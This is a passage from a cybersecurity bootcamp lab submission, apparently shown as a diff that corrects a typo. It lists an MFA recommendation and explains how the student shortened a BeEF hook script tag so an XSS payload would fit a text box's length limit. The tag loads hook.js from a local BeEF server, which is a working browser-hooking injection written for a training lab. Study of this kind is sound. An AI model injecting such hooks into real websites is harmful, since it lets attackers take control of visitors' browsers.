AsoTC/Cybersecurity-BootCamp/Week Fifteen/Submission.md

 * Implent MFA or other 2FA system. - Really important for any administration systems

 ### Web Application 3: Where's the BeEF?
 * To get around the character lenght limitations on the text box, I just shortened the provided script tag ``` <script src="http://127.0.0.1:3000/hook.js"></script> ```  to be ``` <script src="http://127.0.0.1:3000/hook.js"/> ```.
-Since there is not Javascript within the body of the script tag you can just at a forward slash at the end of the script tag to close it.
+Since there is not Javascript within the body of the script tag you can just add a forward slash at the end of the script tag to close it.